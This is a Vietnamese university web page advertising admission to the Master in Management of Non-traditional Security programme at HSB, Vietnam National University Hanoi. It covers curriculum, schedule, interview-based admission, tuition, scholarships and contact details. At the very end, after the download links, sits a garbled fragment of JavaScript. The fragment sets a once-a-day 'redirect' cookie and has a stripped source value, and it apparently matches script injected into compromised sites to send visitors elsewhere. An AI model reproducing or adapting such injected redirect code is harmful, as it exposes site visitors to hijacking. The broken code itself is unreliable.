Tuyển sinh Thạc sĩ Quản trị An ninh phi truyền thống (MNS) khóa 07/2017

Anh dai dien MNS Khoa Quản trị và Kinh doanh tiếp tục tuyển sinh chương trình Thạc sĩ Quản trị An ninh phi truyền thống (MNS).

TUYỂN SINH CHƯƠNG TRÌNH THẠC SĨ

QUẢN TRỊ AN NINH PHI TRUYỀN THỐNG (MNS)

Chương trình đào tạo Thạc sĩ Quản trị An ninh Phi truyền thống (Master in Management of Non-traditional Security, MNS) của Khoa Quản trị và Kinh doanh (HSB) do Đại học Quốc gia Hà Nội cấp bằng là một chương trình đào tạo mới, có tính liên ngành cao, là chương trình tiên phong trong khu vực Đông Nam Á đào tạo về các vấn đề an ninh phi truyền thống.

Chương trình ra đời là phù hợp với Nghị quyết Hội nghị lần thứ 8 Ban chấp hành Trung ương Đảng (Khóa XI) về Chiến lược bảo vệ Tổ quốc Việt Nam trong tình hình mới.

Chương trình được sáng tạo và thiết kế bởi nhóm các chuyên gia hàng đầu về khoa học liên ngành gồm GS.TS. Mai Trọng Nhuận; Thượng tướng, TS. Nguyễn Văn Hưởng; PGS.TS. Hoàng Đình Phi; GS.TSKH. Vũ Minh Giang và được triển khai tại HSB với sự hợp tác xây dựng và giảng dạy của Đại học San Diego, Mỹ; Trường Quản trị, Đại học Queensland, Australia; Đại học Nanyang, Singpore; Trường Kinh doanh IPAG, CH Pháp.

 Untitled

1. Khung chương trình đào tạo của MNS:

Gồm 14 học phần và luận văn tốt nghiệp với tổng số 64 tín chỉ, giảng dạy bằng tiếng Việt. Học viên sẽ được học theo kết cấu chương trình thạc sĩ chuẩn Đại học Quốc gia Hà Nội gồm 03 khối kiến thức là khối kiến thức chung, khối kiến thức nhóm chuyên ngành và khối kiến thức chuyên ngành.

Trong khối kiến thức chuyên ngành học viên sẽ học những học phần bắt buộc và được lựa chọn những học phần theo định hướng học tập và nghiên cứu của riêng mình. Chương trình còn có được sự hợp tác từ các đối tác lâu dài của HSB đến từ ĐH San Diego, Mỹ; Trường Quản trị, Đại học Queensland, Australia; Đại học Nanyang, Singapore; Trường Kinh doanh IPAG, CH Pháp.

Trên cơ sở tham khảo tri thức quốc tế, kinh nghiệm chuyên gia, phương pháp giảng dạy hiện đại gắn lí luận với giải quyết các vấn đề thực tiễn, tập trung giúp người học rèn luyện các kỹ năng tổng hợp lí luận, kỹ năng phản biện, kỹ năng vận dụng sáng tạo các công cụ tư duy, công cụ hành động. Bên cạnh đó, việc học tập thực tế sẽ được trao đổi bởi những chuyên gia trong ngành an ninh, các diễn giả uy tín trong và ngoài nước thông qua các seminar, các buổi học thực tế, các bài tập nhóm, các game… giúp cho người học có cái nhìn toàn cảnh, đa chiều hơn.

Với phương pháp giảng dạy này, người học được trang bị kiến thức, kỹ năng để có thể tham gia ban hành và thực thi các quyết định liên quan tới quản trị an ninh phi truyền thống và phát triển bền vững của tổ chức và doanh nghiệp một cách chính xác hơn, nhanh hơn và hiệu quả hơn.

2. Chương trình định hướng chuẩn đầu vào và đầu ra tới các nhóm đối tượng:
      – Lãnh đạo và nhà quản lý tham gia công tác hoạch định chính sách phát triển KH-XH, quản lý kinh tế, phòng chống thiên tai, tệ nạn xã hội… từ cấp trung ương tới địa phương;
      – Thành viên hội đồng quản trị, ban kiểm soát nội bộ, ban kiểm soát rủi ro, ban pháp chế và an ninh, chuyên gia an ninh phi truyền thống… làm việc cho các doanh nghiệp Việt Nam, doanh nghiệp FDI, các tổ chức ngoại giao, các tổ chức phi chính phủ và tổ chức quốc tế;
      – Các nhà nghiên cứu và giảng viên có mong muốn giảng dạy các môn liên ngành có liên quan tới quản trị an ninh, nghiên cứu chiến lược, nghiên cứu quốc tế, phát triển bền vững..

 an ninh toan cau

3. Thời gian đào tạo:

Thời gian đào tạo mỗi khóa MNS từ 18 – 24 tháng, chia thành 04 kỳ học. Các học phần kiến thức sẽ được học trong 03 kỳ học và kỳ cuối dành cho việc thực hiện luận văn.

Lịch học các ngày thứ 7 và chủ nhật hàng tuần. Thông thường học 03 tuần sẽ được nghỉ 1 tuần, học 03 tháng sẽ nghỉ 01 tháng để chuyển sang kỳ học sau.

Các hội thảo khoa học, tham quan và học tập thực tế, trao đổi cùng diễn giả… sẽ được tổ chức vào giữa hoặc cuối mỗi kỳ học, tối thiểu 01 hoạt động/01 kỳ. Các hoạt động thảo luận nhóm, game… được thực hiện trong tất cả các môn học để tạo sự hấp dẫn trong học tập đồng thời khuyến khích người học học tập một cách tốt nhất.

4. Hình thức thi tuyển: 

Được sự ủng hộ và nhất trí của ĐHQGHN, chương trình đào tạo MNS triển khai áp dụng thí điểm phương thức thi tuyển “đánh giá hồ sơ và phỏng vấn chuyên môn” bắt đầu từ kỳ tuyển sinh sau đại học 2017. Đây là phương thức thi tuyển mới và hiện đại, đang được áp dụng cho các chương trình đào tạo cao học tại nước ngoài cũng như liên kết tại Việt Nam, MNS là chương trình thạc sĩ chính quy đầu tiên áp dụng phương thức tuyển sinh này.
         – Đánh giá hồ sơ: tiểu ban đánh giá hồ sơ tiến hành kiểm tra hồ sơ của ứng viên;
         – Phỏng vấn chuyên môn: Hội đồng phỏng vấn tiến hành phỏng vấn ứng viên sau khi ứng viên hoàn thành bài viết luận;
         – Môn Ngoại ngữ: Tiếng Anh, theo quy định chung của ĐHQGHN.

test

5. Học bổng và các giá trị dành cho Học viên:

Được sự hỗ trợ từ phía các trường đối tác nước ngoài, từ Đại học Quốc gia Hà Nội và các quĩ phát triển giáo dục, quĩ cựu học viên HSB; chương trình MNS có mức học phí 110.000.000 VND (Một trăm mười triệu đồng) cho cả khóa học 02 năm. Và đặc biệt trong mỗi khóa học, HSB cũng dành riêng quĩ học bổng cho những học viên xuất sắc lên tới 300.000.000 (Ba trăm triệu đồng). Bên cạnh đó, MNS tiếp tục mang lại cho người học những giá trị gia tăng chỉ có tại HSB:
      – Tiêu chuẩn quốc tế: HSB là tổ chức giáo dục đầu tiên của Việt Nam được công nhận là thành viên của Hiệp hội các trường Kinh doanh Châu Á Thái Bình Dương (AAPBS). Được sự hỗ trợ và hợp tác lâu dài của Đại học Queensland, Australia, HSB cam kết tuân thủ những tiêu chuẩn về chất lượng đào tạo theo chuẩn đầu ra của chương trình.
      – Phương pháp giảng dạy: Đội ngũ giảng viên của chương trình MNS luôn tâm huyết xây dựng một chương trình đào tạo có tính thực tiễn cao, luôn chú trọng tăng cường trao đổi và thảo luận giữa các học viên thông qua những dự án nghiên cứu theo nhóm và cá nhân, giúp học viên có cơ hội học tập và nghiên cứu chuyên sâu. Trong chương trình học, giảng viên còn cung cấp nhiều ví dụ minh họa sinh động như video, thảo luận, bài tập tình huống, xây dựng nhóm học tập và hướng dẫn học viên tiếp cận với những kiến thức hiện đại về mặt công nghệ.
      – Giao lưu với các diễn giả uy tín: Sự hiện diện của những diễn giả, những chuyên gia an ninh đầu ngành là một đặc điểm nổi bật của chương trình MNS. Họ nguyên hoặc hiện đang là Thứ trưởng, Đặc phái viên, Bộ trưởng… của các Bộ Quốc phòng, Bộ Công an hay là giảng viên của các Học viện Cảnh sát, Học viên An ninh… sẽ tham gia giảng dạy hoặc hội thảo chuyên đề trong chương trình.
      – Cơ hội kết nối: HSB tự hào với hơn 12.000 cựu học viên của câu lạc bộ cựu học viên (HSB-AC) trong đó có những người hiện đang đảm nhiệm những vị trí quan trọng của đất nước như Bộ trưởng, Thứ trưởng, Bí thư tỉnh ủy, Tổng Giám đốc, Chủ tịch tập đoàn, CEO… của các tổ chức, doanh nghiệp hàng đầu Việt Nam được kết nối với nhau bởi mạng lưới cựu học viên vững mạnh. Có nhiều hoạt động giúp gắn kết các cựu học viên với nhau như tìm kiếm nguồn lực, cộng đồng mạng, tuyển dụng… và nhiều hoạt động khác để duy trì quan hệ cộng đồng này.

MNS4

Những chương trình tương tự đã được giảng dạy và chấp nhận rộng rãi ở Mỹ, Hà Lan, Sigapore…Chương trình đã tuyển sinh 07 khóa với nhiều học viên ở các ngành nghề khác nhau: Quân đội, Công an, Ngân hàng, Hành chính sự nghiệp, Giáo dục,…Và tiếp nối sự thành công đó Chương trình hiện đang tuyển sinh Khóa 08, thời gian xét tuyển dự kiến vào tháng 04/2018.

Thông tin chi tiết xin vui lòng liên hệ:

Phòng Tuyển sinh – Khoa Quản trị và Kinh doanh (HSB), ĐHQG Hà Nội
Hotline: 024.6292 3030 – 0903281028
Email: [email protected]/ [email protected]
Địa chỉ: nhà B1, số 144 Xuân Thủy, Cầu Giấy, Hà Nội
Website: www.hsb.edu.vn

Hoặc download các thông tin về MNS tại đây:
1. Giới thiệu chương trình MNS
2. Phiếu đăng ký thông tin học viên
3. Hồ sơ tuyển sinh
4. Khung chương trình

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}

Related Posts